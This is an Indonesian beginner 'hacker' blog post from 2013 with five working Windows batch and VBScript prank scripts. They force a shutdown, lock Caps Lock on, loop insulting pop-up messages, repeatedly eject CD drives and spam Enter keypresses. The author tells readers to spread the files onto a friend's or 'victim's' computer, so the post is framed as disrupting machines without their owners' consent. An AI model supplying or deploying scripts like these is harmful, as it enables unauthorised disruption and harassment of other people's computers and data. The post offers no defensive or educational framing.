BLAJAR HACKER PEMULA (ISENG)

BLAJAR HACKER PEMULA (ISENG)

  • TRIK 1  - Membuat Forced Shoutdown
    -------------------------------------------------
    @echo off
    msg * Pesan 1
    shutdown -c "Pesan 2" -s
    -------------------------------------------------
    simpan kode script yang berwarna Merah di Notepad dengan nama : xhack.BAT type file : All file
    sebarkan File tersebut di Komputer teman Anda,
    maka Komputer korban akan otomatis FORCED SHOUTDOWN
  • TRIK 2 - Membuat Tombol Caps Lock menyala terus-menerus
    ------------------------------------------------------------------
    Set wshShell =wscript.CreateObject("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "{CAPSLOCK}"
    loop
    -------------------------------------------------------
    seperti cara yang pertama, hanya berbeda kode script simpan kode yang berwarna biru di Notepad dengan nama : xhack.VBS type File : All File
    sebarkan File berikut di Komputer korban maka, Tombol CAPSLOCK akan menyala terus-menerus
    (bila dimatikan akan menyala lagi)
  • TRIK 3 - Membuat Pesan Jail mucul terus
    ------------------------------------------------------
    @ECHO off
    :Begin
    msg * muka kamu sangat jelek
    msg * ngaca dulu gih,
    msg * hayo lo,cpu lu gw acak acak
    msg * udah install ulang aja
    msg * biar masalah nya kelar
    GOTO BEGIN

    ------------------------------------------------------

    simpan kode script yang berwarna hijau dengan nama xhack.BAT type file : All File
    Cara ini sangat simple Jail, walaupun di close tab pesan ini masih muncul, kata katanya bisa diubah sesuai selera.
  • TRIK 4 - Jail dengan Membuka Tutup CD/DVD room
    ------------------------------------------------------
    Set oWMP = CreateObject("WMPlayer.OCX.7")
    Set colCDROMs = oWMP.cdromCollection
    do
    if colCDROMs.Count >= 1 then
    For i = 0 to colCDROMs.Count - 1
    colCDROMs.Item(i).Eject
    Next
    For i = 0 to colCDROMs.Count - 1
    colCDROMs.Item(i).Eject
    Next
    End If
    wscript.sleep 5000
    loop-------------------------------------------------------
    simpan di Notepad kode berikut dengan nama : xhack.vbs type file : All File
    maka DVD/CD roomnya akan membuka dan menutup otomatis,
  • TRIK 5 - Membuat script mucul terus menerus
    -------------------------------------------------------
    Set wshShell = wscript.CreateObject("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "~(enter)"
    loop
    -------------------------------------------------------
    simpan kode berikut di Notepad dengan nama : xhack.vbs type file : All File
    membuat script bermunculan terus menerus



share this article to: Facebook Twitter Google+ Linkedin Technorati Digg
Posted by rasyidiqbal, Published at 11/24/2013 08:36:00 pm and have 0 comments

No comments:

Post a Comment